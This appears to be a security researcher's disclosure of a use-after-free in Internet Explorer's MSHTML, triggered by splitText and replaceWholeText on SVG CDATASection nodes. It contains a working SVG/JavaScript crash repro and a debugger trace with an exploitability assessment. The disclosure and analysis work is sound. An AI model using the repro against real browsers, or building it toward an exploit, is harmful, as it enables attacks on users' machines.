It appears there is an implementation bug in the splitText method of CDATASection (Text) objects in SVG. The bug can be triggered by calling the method with index argument 0 on a CDATASection with text. It appears that this causes MSIE to return a copy of the entire text (as expected) but not remove it from the object (which is unexpected). The attached repro, when run using page-heap, seems to hint at use-after-free. I suspect the reference counter is not increased, despite the fact that a copy of the text string is being made.

<svg xmlns='http://www.w3.org/2000/svg'>
  <script type="text/javascript">
    var oCDATASection = document.createCDATASection("Aa");
    // splitText should split a Text node into two text Nodes, each containing a substring of the data of the original Text node.
    // However, MSIE does not implement this correctly, causing both Text nodes to refer to the same data.
    oTextNode1 = oCDATASection.splitText(0);
    alert("Expected ''+'Aa', got '" + oCDATASection.wholeText + "'+'" + oTextNode1.wholeText + "'");
    oCDATASection.appendData("Bb");
    alert("Expected 'Bb'+'Aa', got '" + oCDATASection.wholeText + "'+'" + oTextNode1.wholeText + "'");
    oTextNode3 = oCDATASection.splitText(0);
// Leaving the following line in prevents the crash - not sure why.
//    alert("Expected ''+'Bb'+'Aa', got '" + oCDATASection.wholeText + "'+'" + oTextNode3.wholeText + "'+'" + oTextNode1.wholeText + "'");
    oTextNode3.replaceWholeText("Cc");
  </script>
</svg>

EIP:
You were right, there is a read from freed memory, but since the allocation is created and freed in the same line of JS (oTextNode3.replaceWholeText("Cc");) and then reused again I dont see much options of controlling the freed memory. If we just let it be freed and continue running and thus reading from the freed memory we will get a nullpointer deref.

Incase you are interrested, below is the trace log with the relevant allocation and free and  the stack:


-------------------------------------------------- oTextNode3.replaceWholeText("Cc");
alloc(0x20) = 0x0e4b6fe0 from 6ef8b757
eax=0e4b6fe0 ebx=0d84afb8 ecx=77833cc3 edx=00000000 esi=09cd1fd8 edi=00000001
eip=7782e12c esp=08c3cec8 ebp=08c3ceec iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!RtlAllocateHeap+0x169:
7782e12c c20c00          ret     0Ch
1:019> kv
ChildEBP RetAddr  Args to Child              
08c3ceec 6ed12340 1029be70 00000000 08c3cff0 ntdll!RtlAllocateHeap+0x169 (FPO: [Non-Fpo])
08c3cf24 6f2c0be3 0d84afb8 00000005 08c3cff0 MSHTML!CMarkupPointer::FindTextIdentity+0x5c (FPO: [Non-Fpo])
08c3d03c 6f2c0b14 0c9eefd0 00000000 0b0cae0c MSHTML!CDOMTextNode::RemoveAdjacentTextNodes+0x7f (FPO: [1,61,4])
08c3d05c 6f453bad 0c9eefd0 0e25ffe4 08c3d090 MSHTML!CDOMTextNode::replaceWholeText+0x2a (FPO: [3,1,4])
08c3d0a8 6e6085fe 0b955450 10000002 0b955690 MSHTML!CFastDOM::CText::Trampoline_replaceWholeText+0x72 (FPO: [2,11,4])
08c3d0e4 6e67a2b8 0b955450 6f453b3b 10000002 jscript9!Js::JavascriptFunction::CallFunction+0xc4 (FPO: [Non-Fpo])
08c3d138 08ce07d0 08c3d138 10000002 0b955690 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117 (FPO: [Non-Fpo])

free(0x0e4b6fe0), size=0x000586d8 from (751114dd)
eax=00000098 ebx=00000000 ecx=00000007 edx=00490000 esi=0e4b6fe0 edi=00000000
eip=7782dfa5 esp=08c3cdfc ebp=08c3ce0c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!RtlFreeHeap:
7782dfa5 8bff            mov     edi,edi
1:019> kv
ChildEBP RetAddr  Args to Child              
08c3cdf8 751114dd 00490000 00000000 0e4b6fe0 ntdll!RtlFreeHeap (FPO: [Non-Fpo])
08c3ce0c 6f0cde63 00490000 00000000 0e4b6fe0 kernel32!HeapFree+0x14 (FPO: [Non-Fpo])
08c3ce34 6f0cdde3 0e4b6fe0 0e4b6fe0 0d84afb8 MSHTML!CMarkup::FreeTreePos+0x99 (FPO: [1,1,4])
08c3ce74 6f0cdee7 0e4b6fe0 08c3cec0 08c3cec4 MSHTML!CMarkup::RemovePointerPos+0x5d (FPO: [3,9,4])
08c3ce98 6ef4b7b8 08c3cec0 08c3cec4 0d84afb8 MSHTML!CMarkupPointer::UnEmbed+0x90 (FPO: [2,2,0])
08c3ceb4 6ef4bb26 0d84afb8 0afdafd8 00000000 MSHTML!CMarkupPointer::MoveToReference+0x7d (FPO: [Non-Fpo])
08c3cee8 6ed12384 1029be70 00000000 00000000 MSHTML!CMarkupPointer::MoveToGap+0xa1 (FPO: [Non-Fpo])
08c3cf24 6f2c0be3 0d84afb8 0afdafd8 08c3cff0 MSHTML!CMarkupPointer::FindTextIdentity+0x12e (FPO: [Non-Fpo])
08c3d03c 6f2c0b14 0c9eefd0 00000000 0b0cae0c MSHTML!CDOMTextNode::RemoveAdjacentTextNodes+0x7f (FPO: [1,61,4])
08c3d05c 6f453bad 0c9eefd0 0e25ffe4 08c3d090 MSHTML!CDOMTextNode::replaceWholeText+0x2a (FPO: [3,1,4])
08c3d0a8 6e6085fe 0b955450 10000002 0b955690 MSHTML!CFastDOM::CText::Trampoline_replaceWholeText+0x72 (FPO: [2,11,4])
08c3d0e4 6e67a2b8 0b955450 6f453b3b 10000002 jscript9!Js::JavascriptFunction::CallFunction+0xc4 (FPO: [Non-Fpo])
08c3d138 08ce07d0 08c3d138 10000002 0b955690 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117 (FPO: [Non-Fpo])

1:019> bp !mshtml + 0x29baaf
1:019> g
Breakpoint 4 hit
MSHTML!CMarkupPointer::MoveToGap:
6ef4baaf 8bff            mov     edi,edi
6ef4bab1 55              push    ebp
6ef4bab2 8bec            mov     ebp,esp
1:019> 
eax=1029be70 ebx=08c30002 ecx=08c3cff0 edx=08c3cf14 esi=0e4b6fe0 edi=08c3cff0
eip=6ef4bab4 esp=08c3cee8 ebp=08c3cee8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CMarkupPointer::MoveToGap+0x5:
6ef4bab4 8a4209          mov     al,byte ptr [edx+9]        ds:002b:08c3cf1d=00
6ef4bab7 83ec0c          sub     esp,0Ch
6ef4baba 56              push    esi
1:019> dc edx
08c3cf14  00000000 0e4b6fe0 08c30002 0e4b6fe0  .....oK......oK.
08c3cf24  08c3d03c 6f2c0be3 0d84afb8 0afdafd8  <.....,o........
08c3cf34  08c3cff0 00000000 0c9eefd0 08c3d090  ................
08c3cf44  00000001 00000000 6f00f029 0db71e70  ........)..op...
08c3cf54  08c3cfa4 6ef8b23e 00000001 0ce88fc8  ....>..n........
08c3cf64  090aa4cc 6e79ae20 0ce88fc8 00000008  .... .yn........
08c3cf74  80070057 00000000 08c3cfac 6eef815d  W...........]..n
08c3cf84  0db71e70 6f00f029 0d7aaefc 00000000  p...)..o..z.....
6ef4babb 33f6            xor     esi,esi
6ef4babd 3c01            cmp     al,1
6ef4babf 0f8436a00000    je      MSHTML!CMarkupPointer::MoveToGap+0x12 (6ef55afb) [br=0]
6ef4bac5 84c0            test    al,al
6ef4bac7 0f85f7302800    jne     MSHTML!CMarkupPointer::MoveToGap+0x1b (6f1cebc4) [br=0]
1:019> 
eax=1029be00 ebx=08c30002 ecx=08c3cff0 edx=08c3cf14 esi=00000000 edi=08c3cff0
eip=6ef4bacd esp=08c3ced8 ebp=08c3cee8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CMarkupPointer::MoveToGap+0x23:
6ef4bacd 8b4a04          mov     ecx,dword ptr [edx+4] ds:002b:08c3cf18=0e4b6fe0
1:019> 
eax=1029be00 ebx=08c30002 ecx=0e4b6fe0 edx=08c3cf14 esi=00000000 edi=08c3cff0
eip=6ef4bad0 esp=08c3ced8 ebp=08c3cee8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CMarkupPointer::MoveToGap+0x26:
6ef4bad0 8b4910          mov     ecx,dword ptr [ecx+10h] ds:002b:0e4b6ff0=????????
1:019> kv
ChildEBP RetAddr  Args to Child              
08c3cee8 6eced8a6 1029be70 00000000 00000000 MSHTML!CMarkupPointer::MoveToGap+0x26 (FPO: [Non-Fpo])
08c3cf24 6f2c0be3 0d84afb8 0afdafd8 08c3cff0 MSHTML!CMarkupPointer::FindTextIdentity+0x160 (FPO: [Non-Fpo])
08c3d03c 6f2c0b14 0c9eefd0 00000000 0b0cae0c MSHTML!CDOMTextNode::RemoveAdjacentTextNodes+0x7f (FPO: [1,61,4])
08c3d05c 6f453bad 0c9eefd0 0e25ffe4 08c3d090 MSHTML!CDOMTextNode::replaceWholeText+0x2a (FPO: [3,1,4])
08c3d0a8 6e6085fe 0b955450 10000002 0b955690 MSHTML!CFastDOM::CText::Trampoline_replaceWholeText+0x72 (FPO: [2,11,4])
08c3d0e4 6e67a2b8 0b955450 6f453b3b 10000002 jscript9!Js::JavascriptFunction::CallFunction+0xc4 (FPO: [Non-Fpo])
08c3d138 08ce07d0 08c3d138 10000002 0b955690 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x117 (FPO: [Non-Fpo])